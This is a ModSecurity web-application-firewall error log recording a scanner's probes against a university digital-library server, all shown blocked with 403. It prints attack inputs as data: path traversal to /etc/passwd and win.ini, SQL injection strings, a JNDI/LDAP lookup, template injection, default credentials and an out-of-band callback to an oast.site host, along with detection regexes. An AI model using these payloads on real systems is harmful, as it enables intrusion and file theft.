[Tue Aug 29 11:44:27.378900 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13q8Co-f0AAAdxUfMAAAAC"]
[Tue Aug 29 11:44:29.479017 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:link. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:link: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO13rcCo-f0AAAe3@DEAAAAA"]
[Tue Aug 29 11:44:32.468380 2023] [:error] [pid 2104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/download.php"] [unique_id "ZO13sMCo-f0AAAg4DZMAAAAI"]
[Tue Aug 29 11:44:35.395196 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g7dbdidy8ibrjs.oast.site found within TX:1: cjmnbitjmimt14dgn26g7dbdidy8ibrjs.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/composer/send_email"] [unique_id "ZO13s8Co-f0AAAfiYogAAAAg"]
[Tue Aug 29 11:44:35.412867 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ())\\x09 found within ARGS:q: ')\\x09UNION\\x09SELECT\\x09*\\x09FROM\\x09(SELECT\\x09null)\\x09AS\\x09a1\\x09\\x09JOIN\\x09(SELECT\\x091)\\x09as\\x09u\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b1\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b2\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a3\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a4\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a5\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a6\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a7\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a8\\x09\\x09JOIN\\x09..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/api/v1/repos/search"] [unique_id "ZO13s8Co-f0AAAgzyPMAAAAF"]
[Tue Aug 29 11:44:43.541276 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/mypixs/mypixs/downloadpage.php"] [unique_id "ZO13u8Co-f0AAAfZj7cAAAAN"]
[Tue Aug 29 11:44:44.453778 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:name: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/jnoj/web/polygon/problem/viewfile"] [unique_id "ZO13vMCo-f0AAAdftlQAAAAG"]
[Tue Aug 29 11:44:47.365759 2023] [:error] [pid 2012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/spreadsheet-reader/test.php"] [unique_id "ZO13v8Co-f0AAAfcoUQAAAAa"]
[Tue Aug 29 11:44:47.683931 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"username":"admin","password":"public"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/api/v4/auth"] [unique_id "ZO13v8Co-f0AAAfiYqwAAAAg"]
[Tue Aug 29 11:44:48.414005 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/nuovo/spreadsheet-reader/test.php"] [unique_id "ZO13wMCo-f0AAAfSWeUAAAAB"]
[Tue Aug 29 11:44:48.460916 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:code: ../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/plus/carbuyaction.php"] [unique_id "ZO13wMCo-f0AAAfSWecAAAAB"]
[Tue Aug 29 11:44:49.426690 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:redirect: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO13wcCo-f0AAAdOefYAAAAS"]
[Tue Aug 29 11:44:50.371674 2023] [:error] [pid 2124] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO13wsCo-f0AAAhMtUAAAAAM"]
[Tue Aug 29 11:44:51.485415 2023] [:error] [pid 2012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13w8Co-f0AAAfcoVYAAAAa"]
[Tue Aug 29 11:44:51.523571 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:url: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO13w8Co-f0AAAdxUigAAAAC"]
[Tue Aug 29 11:44:53.483913 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fullPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fullPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/fileDownload"] [unique_id "ZO13xcCo-f0AAAfZj90AAAAN"]
[Tue Aug 29 11:44:56.408799 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:files[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:files[]: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php"] [unique_id "ZO13yMCo-f0AAAgzyRMAAAAF"]
[Tue Aug 29 11:45:00.667989 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: windows/win.ini\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zMCo-f0AAAfbkuwAAAAZ"]
[Tue Aug 29 11:45:00.977649 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:filePath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/portal/attachment_downloadByUrlAtt.action"] [unique_id "ZO13zMCo-f0AAAfiYtEAAAAg"]
[Tue Aug 29 11:45:01.374369 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zcCo-f0AAAhzvaEAAAAx"]
[Tue Aug 29 11:45:02.416698 2023] [:error] [pid 2168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zsCo-f0AAAh4DWsAAAA2"]
[Tue Aug 29 11:45:02.430693 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zsCo-f0AAAgzySIAAAAF"]
[Tue Aug 29 11:45:05.352106 2023] [:error] [pid 2159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: etc/passwd\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130cCo-f0AAAhvjVAAAAAs"]
[Tue Aug 29 11:45:05.381002 2023] [:error] [pid 2159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130cCo-f0AAAhvjVEAAAAs"]
[Tue Aug 29 11:45:06.372507 2023] [:error] [pid 2120] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{\\r\\n   "type":"read",\\r\\n   "mbean":"java.lang:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x0d\\x0a   \\x22 found within ARGS:{\\x5cr\\x5cn   \\x22type\\x22:\\x22read\\x22,\\x5cr\\x5cn   \\x22mbean\\x22:\\x22java.lang:type: Memory\\x22,\\x0d\\x0a   \\x22target\\x22:{\\x0d\\x0a      \\x22url\\x22:\\x22service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\\x22\\x0d\\x0a   }\\x0d\\x0a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/jolokia/read/getDiagnosticOptions"] [unique_id "ZO130sCo-f0AAAhISRcAAAAH"]
[Tue Aug 29 11:45:06.387072 2023] [:error] [pid 2161] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130sCo-f0AAAhxwlEAAAAv"]
[Tue Aug 29 11:45:07.391175 2023] [:error] [pid 2166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:patron_only_image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:patron_only_image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO1308Co-f0AAAh2H2wAAAA0"]
[Tue Aug 29 11:45:07.430226 2023] [:error] [pid 2171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1308Co-f0AAAh7wsgAAAA5"]
[Tue Aug 29 11:45:09.395172 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:student_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:student_id: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/TransferredOutModal.php"] [unique_id "ZO131cCo-f0AAAe3@JwAAAAA"]
[Tue Aug 29 11:45:10.359246 2023] [:error] [pid 2167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO131sCo-f0AAAh3f6gAAAA1"]
[Tue Aug 29 11:45:11.395161 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO1318Co-f0AAAe3@KAAAAAA"]
[Tue Aug 29 11:45:12.379417 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:id: ../../Conf/config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO132MCo-f0AAAgzyTAAAAAF"]
[Tue Aug 29 11:45:13.384191 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO132cCo-f0AAAfbkwIAAAAZ"]
[Tue Aug 29 11:45:15.375877 2023] [:error] [pid 2142] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))}{ found within ARGS:keys: {if:array_map(base_convert(27440799224,10,32),array(1))}{end if}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/search/"] [unique_id "ZO1328Co-f0AAAheaYUAAAAY"]
[Tue Aug 29 11:45:16.412254 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/src/read_body.php"] [unique_id "ZO133MCo-f0AAAhT3w8AAAAD"]
[Tue Aug 29 11:45:17.409326 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO133cCo-f0AAAfbkwkAAAAZ"]
